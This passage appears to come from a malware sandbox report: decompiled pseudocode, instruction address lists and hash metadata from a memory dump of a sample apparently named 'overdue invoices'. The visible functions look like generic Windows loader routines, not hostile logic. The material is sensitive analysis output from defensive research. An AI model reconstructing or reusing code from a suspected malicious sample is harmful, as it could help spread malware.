															} else {
																__eflags = _t290 & 0x00000001;
																if(__eflags == 0) {
																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																	__eflags = _t349 - 0x10b;
																	if(_t349 != 0x10b) {
																		__eflags = _t349 - 0x20b;
																		if(_t349 == 0x20b) {
																			goto L102;
																		} else {
																			_t307 = 0;
																			_v48 = 0;
																			_t216 = 0xc000007b;
																			_v36 = 0xc000007b;
																			goto L71;
																		}
																	} else {
																		L102:
																		_t307 =  *(_t306 + 0x50);
																		goto L69;
																	}
																	goto L151;
																} else {
																	_t239 = L009AEAEA(_t290, _t290, _t356, _t366, __eflags);
																	_t307 = _t239;
																	_v60 = _t307;
																	_v48 = _t307;
																	__eflags = _t307;
																	if(_t307 != 0) {
																		L70:
																		_t216 = _v36;
																	} else {
																		_push(_t239);
																		_push(0x14);
																		_push( &_v144);
																		_push(3);
																		_push(_v44);
																		_push(0xffffffff);
																		_t319 = L009D9730();
																		_v36 = _t319;
																		__eflags = _t319;
																		if(_t319 < 0) {
																			_t216 = 0xc000001f;
																			_v36 = 0xc000001f;
																			_t307 = _v60;
																		} else {
																			_t307 = _v132;
																			L69:
																			_v48 = _t307;
																			goto L70;
																		}
																	}
																}
															}
															L71:
															_v72 = _t307;
															_v84 = _t216;
															__eflags = _t216 - 0xc000007b;
															if(_t216 == 0xc000007b) {
																L150:
																_v8 = 0xfffffffe;
																_t211 = 0xc000007b;
															} else {
																_t344 = _t290 & 0xfffffffc;
																_v76 = _t344;
																__eflags = _v40 - _t344;
																if(_v40 <= _t344) {
																	goto L150;
																} else {
																	__eflags = _t307;
																	if(_t307 == 0) {
																		L75:
																		_t217 = 0;
																		_v104 = 0;
																		__eflags = _t366;
																		if(_t366 != 0) {
																			__eflags = _t290 & 0x00000001;
																			if((_t290 & 0x00000001) != 0) {
																				_t217 = 1;
																				_v104 = 1;
																			}
																			_t290 = _v44;
																			_v52 = _t290;
																		}
																		__eflags = _t217 - 1;
																		if(_t217 != 1) {
																			_t369 = 0;
																			_t218 = _v40;
																			goto L91;
																		} else {
																			_v64 = 0;
																			E009AE9C0(1, _t290, 0, 0,  &_v64);
																			_t309 = _v64;
																			_v108 = _t309;
																			__eflags = _t309;
																			if(_t309 == 0) {
																				goto L143;
																			} else {
																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																				__eflags = _t226 - 0x10b;
																				if(_t226 != 0x10b) {
																					__eflags = _t226 - 0x20b;
																					if(_t226 != 0x20b) {
																						goto L143;
																					} else {
																						_t371 =  *(_t309 + 0x98);
																						goto L83;
																					}
																				} else {
																					_t371 =  *(_t309 + 0x88);
																					L83:
																					__eflags = _t371;
																					if(_t371 != 0) {
																						_v80 = _t371 - _t356 + _t290;
																						_t310 = _v64;
																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																						_t292 =  *(_t310 + 6) & 0x0000ffff;
																						_t311 = 0;
																						__eflags = 0;
																						while(1) {
																							_v120 = _t311;
																							_v116 = _t348;
																							__eflags = _t311 - _t292;
																							if(_t311 >= _t292) {
																								goto L143;
																							}
																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
																							__eflags = _t371 - _t359;
																							if(_t371 < _t359) {
																								L98:
																								_t348 = _t348 + 0x28;
																								_t311 = _t311 + 1;
																								continue;
																							} else {
																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																									goto L98;
																								} else {
																									__eflags = _t348;
																									if(_t348 == 0) {
																										goto L143;
																									} else {
																										_t218 = _v40;
																										_t312 =  *_t218;
																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																											_v100 = _t359;
																											_t360 = _v108;
																											_t372 = L009A8F44(_v108, _t312);
																											__eflags = _t372;
																											if(_t372 == 0) {
																												goto L143;
																											} else {
																												_t290 = _v52;
																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E009D3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																												_t307 = _v72;
																												_t344 = _v76;
																												_t218 = _v40;
																												goto L91;
																											}
																										} else {
																											_t290 = _v52;
																											_t307 = _v72;
																											_t344 = _v76;
																											_t369 = _v80;
																											L91:
																											_t358 = _a4;
																											__eflags = _t358;
																											if(_t358 == 0) {
																												L95:
																												_t308 = _a8;
																												__eflags = _t308;
																												if(_t308 != 0) {
																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
																												}
																												_v8 = 0xfffffffe;
																												_t211 = _v84;
																											} else {
																												_t370 =  *_t218 - _t369 + _t290;
																												 *_t358 = _t370;
																												__eflags = _t370 - _t344;
																												if(_t370 <= _t344) {
																													L149:
																													 *_t358 = 0;
																													goto L150;
																												} else {
																													__eflags = _t307;
																													if(_t307 == 0) {
																														goto L95;
																													} else {
																														__eflags = _t370 - _t344 + _t307;
																														if(_t370 >= _t344 + _t307) {
																															goto L149;
																														} else {
																															goto L95;
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																							}
																							goto L97;
																						}
																					}
																					goto L143;
																				}
																			}
																		}
																	} else {
																		__eflags = _v40 - _t307 + _t344;
																		if(_v40 >= _t307 + _t344) {
																			goto L150;
																		} else {
																			goto L75;
																		}
																	}
																}
															}
														}
														L97:
														 *[fs:0x0] = _v20;
														return _t211;
													}
												}
											}
										}
									} else {
										goto L46;
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}





































































































                  0x009ad5f2
                  0x009ad5f5
                  0x009ad5f5
                  0x009ad5fd
                  0x009ad600
                  0x009ad60a
                  0x009ad60d
                  0x009ad617
                  0x009ad61d
                  0x009ad627
                  0x009ad62e
                  0x009ad911
                  0x009ad913
                  0x00000000
                  0x009ad919
                  0x009ad919
                  0x009ad919
                  0x009ad634
                  0x009ad634
                  0x009ad634
                  0x009ad634
                  0x009ad640
                  0x009ad8bf
                  0x00000000
                  0x009ad646
                  0x009ad646
                  0x009ad64d
                  0x009ad652
                  0x009fb2fc
                  0x009fb2fc
                  0x009fb302
                  0x009fb33b
                  0x009fb341
                  0x00000000
                  0x009fb304
                  0x009fb304
                  0x009fb319
                  0x009fb31e
                  0x009fb324
                  0x009fb326
                  0x009fb332
                  0x009fb347
                  0x009fb34c
                  0x009fb351
                  0x009fb35a
                  0x00000000
                  0x009fb328
                  0x009fb328
                  0x00000000
                  0x009fb328
                  0x009fb326
                  0x009ad658
                  0x009ad658
                  0x009ad65b
                  0x009ad665
                  0x00000000
                  0x009ad66b
                  0x009ad66b
                  0x009ad66b
                  0x009ad66b
                  0x009ad66d
                  0x009ad672
                  0x009ad67a
                  0x00000000
                  0x00000000
                  0x009ad680
                  0x009ad686
                  0x009ad8ce
                  0x009ad8d4
                  0x009ad8dd
                  0x009ad8e0
                  0x009ad68c
                  0x009ad691
                  0x009ad69d
                  0x009ad6a2
                  0x009ad6a7
                  0x009ad6b0
                  0x009ad6b5
                  0x009ad6e0
                  0x009ad6b7
                  0x009ad6b7
                  0x009ad6b9
                  0x009ad6b9
                  0x009ad6bb
                  0x009ad6bd
                  0x009ad6ce
                  0x009ad6d0
                  0x009ad6d2
                  0x009fb363
                  0x009fb365
                  0x00000000
                  0x009fb36b
                  0x00000000
                  0x009fb36b
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009ad6bf
                  0x009ad6bf
                  0x009ad6e5
                  0x009ad6e7
                  0x009ad6e9
                  0x009ad6ec
                  0x009ad6ec
                  0x009ad6ef
                  0x009ad6f5
                  0x009ad6f9
                  0x009ad6fb
                  0x009ad6fd
                  0x009ad701
                  0x009ad703
                  0x009ad70a
                  0x009ad70a
                  0x009ad701
                  0x009ad710
                  0x009ad710
                  0x009ad6c1
                  0x009ad6c1
                  0x009ad6c6
                  0x009fb36d
                  0x009fb36f
                  0x00000000
                  0x009fb375
                  0x009fb375
                  0x009fb375
                  0x00000000
                  0x009fb375
                  0x00000000
                  0x009ad6cc
                  0x009ad6d8
                  0x009ad6d8
                  0x009ad6d8
                  0x00000000
                  0x009ad6c6
                  0x009ad6bf
                  0x00000000
                  0x009ad6da
                  0x009ad6da
                  0x009ad716
                  0x009ad71b
                  0x009ad720
                  0x009ad726
                  0x009ad726
                  0x009ad72d
                  0x00000000
                  0x009ad733
                  0x009ad739
                  0x009ad742
                  0x009ad750
                  0x009ad758
                  0x009ad764
                  0x009ad776
                  0x009ad77a
                  0x009ad783
                  0x009ad928
                  0x009ad92c
                  0x009ad93d
                  0x009ad944
                  0x009ad94f
                  0x009ad954
                  0x009ad956
                  0x009ad95f
                  0x009ad961
                  0x009ad973
                  0x009ad973
                  0x009ad956
                  0x009ad944
                  0x009ad92c
                  0x009ad78b
                  0x009fb394
                  0x009ad791
                  0x009ad798
                  0x009fb3a3
                  0x009fb3bb
                  0x009fb3bb
                  0x009ad7a5
                  0x009ad866
                  0x009ad870
                  0x009ad892
                  0x009ad898
                  0x009ad89e
                  0x009ad8a0
                  0x009ad8a6
                  0x009ad8ac
                  0x009ad8ae
                  0x009ad8b4
                  0x009ad8b4
                  0x009ad8ae
                  0x009ad7a5
                  0x009ad78b
                  0x009ad7b1
                  0x009fb3c5
                  0x009fb3c5
                  0x009ad7c3
                  0x009ad7ca
                  0x009ad7e5
                  0x009ad7eb
                  0x009ad8eb
                  0x009ad8ed
                  0x00000000
                  0x009ad8f3
                  0x009ad8f3
                  0x009ad8f3
                  0x00000000
                  0x009ad8ed
                  0x009ad7cc
                  0x009ad7cc
                  0x009ad7d2
                  0x00000000
                  0x009ad7d4
                  0x009ad7d4
                  0x009ad7d7
                  0x009ad7df
                  0x009fb3d4
                  0x009fb3d9
                  0x009fb3dc
                  0x009fb3dc
                  0x009fb3df
                  0x009fb3e2
                  0x009fb468
                  0x009fb46d
                  0x009fb46f
                  0x009fb46f
                  0x009fb475
                  0x009ad8f8
                  0x009ad8f9
                  0x009ad8fd
                  0x009fb3e8
                  0x009fb3e8
                  0x009fb3eb
                  0x009fb3ed
                  0x00000000
                  0x009fb3ef
                  0x009fb3ef
                  0x009fb3f1
                  0x009fb3f4
                  0x009fb3fe
                  0x009fb404
                  0x009fb409
                  0x009fb40e
                  0x009fb410
                  0x009fb410
                  0x009fb414
                  0x009fb414
                  0x009fb41b
                  0x009fb420
                  0x009fb423
                  0x009fb425
                  0x009fb427
                  0x009fb42a
                  0x009fb42d
                  0x009fb42d
                  0x009fb42a
                  0x009fb432
                  0x009fb436
                  0x009fb438
                  0x009fb43b
                  0x009fb43b
                  0x009fb449
                  0x009fb44e
                  0x009fb454
                  0x009fb458
                  0x009fb458
                  0x009fb45d
                  0x00000000
                  0x009fb45d
                  0x009fb3ed
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009ad7df
                  0x009ad7d2
                  0x009ad7ca
                  0x009fb37c
                  0x009fb37e
                  0x009fb385
                  0x009fb38a
                  0x00000000
                  0x009fb38a
                  0x009ad742
                  0x009ad7f1
                  0x009ad7f8
                  0x009fb49b
                  0x009fb49b
                  0x009ad800
                  0x009ad837
                  0x009ad843
                  0x009ad845
                  0x009ad847
                  0x009ad84a
                  0x009ad84b
                  0x009ad84e
                  0x009ad857
                  0x009ad818
                  0x009ad824
                  0x009ad831
                  0x009fb4a5
                  0x009fb4ab
                  0x009fb4b3
                  0x009fb4b8
                  0x009fb4bb
                  0x00000000
                  0x009fb4c1
                  0x009fb4c1
                  0x009fb4c8
                  0x00000000
                  0x009fb4ce
                  0x009fb4d4
                  0x009fb4e1
                  0x009fb4e3
                  0x009fb4e5
                  0x00000000
                  0x009fb4eb
                  0x009fb4f0
                  0x009fb4f2
                  0x009adac9
                  0x009adacc
                  0x009adacf
                  0x009adad1
                  0x009add78
                  0x009add78
                  0x009adcf2
                  0x00000000
                  0x009adad7
                  0x009adad9
                  0x009adadb
                  0x00000000
                  0x00000000
                  0x009adae1
                  0x009adae1
                  0x009adae4
                  0x009adae6
                  0x009fb4f9
                  0x009fb4f9
                  0x009fb500
                  0x009adaec
                  0x009adaec
                  0x009adaf5
                  0x009adaf8
                  0x009adafb
                  0x009adb03
                  0x009adb11
                  0x009adb16
                  0x009adb19
                  0x009adb1b
                  0x009fb52c
                  0x009fb531
                  0x009fb534
                  0x009adb21
                  0x009adb21
                  0x009adb24
                  0x009adcd9
                  0x009adce2
                  0x009adce5
                  0x009add6a
                  0x009add6d
                  0x00000000
                  0x009add73
                  0x009fb51a
                  0x009fb51c
                  0x009fb51f
                  0x009fb524
                  0x00000000
                  0x009fb524
                  0x009adce7
                  0x009adce7
                  0x009adce7
                  0x00000000
                  0x009adce7
                  0x00000000
                  0x009adb2a
                  0x009adb2c
                  0x009adb31
                  0x009adb33
                  0x009adb36
                  0x009adb39
                  0x009adb3b
                  0x009adb66
                  0x009adb66
                  0x009adb3d
                  0x009adb3d
                  0x009adb3e
                  0x009adb46
                  0x009adb47
                  0x009adb49
                  0x009adb4c
                  0x009adb53
                  0x009adb55
                  0x009adb58
                  0x009adb5a
                  0x009fb50a
                  0x009fb50f
                  0x009fb512
                  0x009adb60
                  0x009adb60
                  0x009adb63
                  0x009adb63
                  0x00000000
                  0x009adb63
                  0x009adb5a
                  0x009adb3b
                  0x009adb24
                  0x009adb69
                  0x009adb69
                  0x009adb6c
                  0x009adb6f
                  0x009adb74
                  0x009fb557
                  0x009fb557
                  0x009fb55e
                  0x009adb7a
                  0x009adb7c
                  0x009adb7f
                  0x009adb82
                  0x009adb85
                  0x00000000
                  0x009adb8b
                  0x009adb8b
                  0x009adb8d
                  0x009adb9b
                  0x009adb9b
                  0x009adb9d
                  0x009adba0
                  0x009adba2
                  0x009adba4
                  0x009adba7
                  0x009adba9
                  0x009adbae
                  0x009adbae
                  0x009adbb1
                  0x009adbb4
                  0x009adbb4
                  0x009adbb7
                  0x009adbba
                  0x009adcd2
                  0x009adcd4
                  0x00000000
                  0x009adbc0
                  0x009adbc0
                  0x009adbd2
                  0x009adbd7
                  0x009adbda
                  0x009adbdd
                  0x009adbdf
                  0x00000000
                  0x009adbe5
                  0x009adbe5
                  0x009adbee
                  0x009adbf1
                  0x009fb541
                  0x009fb544
                  0x00000000
                  0x009fb546
                  0x009fb546
                  0x00000000
                  0x009fb546
                  0x009adbf7
                  0x009adbf7
                  0x009adbfd
                  0x009adbfd
                  0x009adbff
                  0x009adc0b
                  0x009adc15
                  0x009adc1b
                  0x009adc1d
                  0x009adc21
                  0x009adc21
                  0x009adc23
                  0x009adc23
                  0x009adc26
                  0x009adc29
                  0x009adc2b
                  0x00000000
                  0x00000000
                  0x009adc31
                  0x009adc34
                  0x009adc36
                  0x009adcbf
                  0x009adcbf
                  0x009adcc2
                  0x00000000
                  0x009adc3c
                  0x009adc41
                  0x009adc43
                  0x00000000
                  0x009adc45
                  0x009adc45
                  0x009adc47
                  0x00000000
                  0x009adc4d
                  0x009adc4d
                  0x009adc50
                  0x009adc52
                  0x009adc55
                  0x009adcfa
                  0x009adcfe
                  0x009add08
                  0x009add0a
                  0x009add0c
                  0x00000000
                  0x009add12
                  0x009add15
                  0x009add2d
                  0x009add2f
                  0x009add32
                  0x009add35
                  0x00000000
                  0x009add35
                  0x009adc5b
                  0x009adc5b
                  0x009adc5e
                  0x009adc61
                  0x009adc64
                  0x009adc67
                  0x009adc67
                  0x009adc6a
                  0x009adc6c
                  0x009adc8e
                  0x009adc8e
                  0x009adc91
                  0x009adc93
                  0x009adcce
                  0x009adcce
                  0x009adc95
                  0x009adc9c
                  0x009adc6e
                  0x009adc72
                  0x009adc75
                  0x009adc77
                  0x009adc79
                  0x009fb551
                  0x009fb551
                  0x00000000
                  0x009adc7f
                  0x009adc7f
                  0x009adc81
                  0x00000000
                  0x009adc83
                  0x009adc86
                  0x009adc88
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009adc88
                  0x009adc81
                  0x009adc79
                  0x009adc6c
                  0x009adc55
                  0x009adc47
                  0x009adc43
                  0x00000000
                  0x009adc36
                  0x009adc23
                  0x00000000
                  0x009adbff
                  0x009adbf1
                  0x009adbdf
                  0x009adb8f
                  0x009adb92
                  0x009adb95
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009adb95
                  0x009adb8d
                  0x009adb85
                  0x009adb74
                  0x009adc9f
                  0x009adca2
                  0x009adcb0
                  0x009adcb0
                  0x009adad1
                  0x009fb4e5
                  0x009fb4c8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x009ad831
                  0x00000000
                  0x009ad800
                  0x009fb47f
                  0x009fb485
                  0x00000000
                  0x009fb485
                  0x009ad665
                  0x009ad652
                  0x00000000

                  Memory Dump Source
                  • Source File: 00000001.00000002.443244927.0000000000970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00970000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_1_2_970000_overdue invoices.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 09a05a57c6137dfc132a2deff067b07c34bc1bafb38f5c61eb141942e8fea917
                  • Instruction ID: f9d5723207c142f59d066a1d6ff72d54a6cab778610fceb2108b7cfd7c1d2845
                  • Opcode Fuzzy Hash: 09a05a57c6137dfc132a2deff067b07c34bc1bafb38f5c61eb141942e8fea917
                  • Instruction Fuzzy Hash: BFE11770A02319CFDB34DF18C984BB9B7B6BF86304F1441A9E90A97691DB749D81CF91
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 009A849B Relevance: .3, Instructions: 290COMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E009A849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0xa6f9c0);
				E009ED0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0xa87b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E009ACEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E009B2280( *[fs:0x30], 0xa88550);
						_t139 =  *0xa87b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E009CF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								L009AFFB0(_t193, _t235, 0xa88550);
								L5:
								return E009ED130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E00991C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0xa87b9c; // 0x0
							_t235 = L009B4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0xa87b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E009CA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									L009AFFB0(_t193, _t235, 0xa88550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L009B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L009B77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0xa87b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0xa87b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = L009D37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0xa87b9c; // 0x0
									_t214 = L009B4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												L009D37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0xa87b10 =  *0xa87b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0xa87b04 =  *0xa87b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L009B77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L009B77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0xa87b08 =  *0xa87b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												L009D57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E009DF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L009B77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E009CA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L009B77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E009D96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                  0x009a849b
                  0x009a849b
                  0x009a849b
                  0x009a849b
                  0x009a849d
                  0x009a84a2
                  0x009a84a7
                  0x009a84b1
                  0x009a84d8
                  0x00000000
                  0x009a84b3
                  0x009a84c4
                  0x009a84c9
                  0x009a84cd
                  0x009a84cf
                  0x009a84cf
                  0x009a84d6
                  0x009a84e6
                  0x009a84e9
                  0x009a84ec
                  0x009a84ef
                  0x009a84f2
                  0x009a84f4
                  0x009a84fc
                  0x009a8501
                  0x009a8506
                  0x009a8509
                  0x009a86e0
                  0x009a86e5
                  0x009a86e8
                  0x009a86ed
                  0x009a86f0
                  0x009a86f2
                  0x009f9afd
                  0x009f9b02
                  0x009a84da
                  0x009a84df
                  0x009a84df
                  0x009a86fa
                  0x009a86fd
                  0x009a86fe
                  0x009a8701
                  0x009a8706
                  0x009a8709
                  0x009a870b
                  0x00000000
                  0x00000000
                  0x009a8711
                  0x009a8725
                  0x009a8727
                  0x009a872a
                  0x009a872c
                  0x009f9af0
                  0x009f9af5
                  0x009a8732
                  0x009a8732
                  0x009a8732
                  0x009a8735
                  0x009a8737
                  0x009a8515
                  0x009a8515
                  0x009a8518
                  0x009a851d
                  0x009a8523
                  0x009a8527
                  0x009a852b
                  0x009a8537
                  0x009a8539
                  0x009a853c
                  0x009a853e
                  0x009a868c
                  0x009a8691
                  0x009a8699
                  0x009a869b
                  0x009a8744
                  0x009a8748
                  0x009a86a1
                  0x009a86a1
                  0x009a86a1
                  0x009a86a4
                  0x009a86a8
                  0x009f9bdf
                  0x009f9bdf
                  0x009a86ae
                  0x009a86b0
                  0x00000000
                  0x009a86b6
                  0x00000000
                  0x009f9be9
                  0x009a86b0
                  0x009a8544
                  0x009a854a
                  0x009a854d
                  0x009a8551
                  0x009a876e
                  0x009a8778
                  0x009a877b
                  0x009a8780
                  0x009a8557
                  0x009a8557
                  0x009a855d
                  0x009a855d
                  0x009a856b
                  0x009a856e
                  0x009a8570
                  0x009a8573
                  0x009a8576
                  0x009a8576
                  0x009a8579
                  0x009a857b
                  0x00000000
                  0x00000000
                  0x009a8581
                  0x009a85a0
                  0x009a85a2
                  0x009a85a5
                  0x009a85a7
                  0x009f9b1b
                  0x009f9b1b
                  0x009a862e
                  0x009a862e
                  0x009a8631
                  0x009a8631
                  0x009a8634
                  0x009a8636
                  0x009a8669
                  0x009a8669
                  0x009a866b
                  0x009f9bbf
                  0x009f9bc4
                  0x009f9bc8
                  0x009f9bce
                  0x009f9bce
                  0x009a8671
                  0x009a8671
                  0x009a8674
                  0x009a8676
                  0x009f9bae
                  0x009f9bae
                  0x009a8676
                  0x009a867c
                  0x009a867e
                  0x009a8688
                  0x009a8688
                  0x00000000
                  0x009a867e
                  0x009a8638
                  0x009a8638
                  0x009a863b
                  0x009a863e
                  0x009a863f
                  0x009a8642
                  0x009a8645
                  0x009a8648
                  0x009a864d
                  0x009f9b69
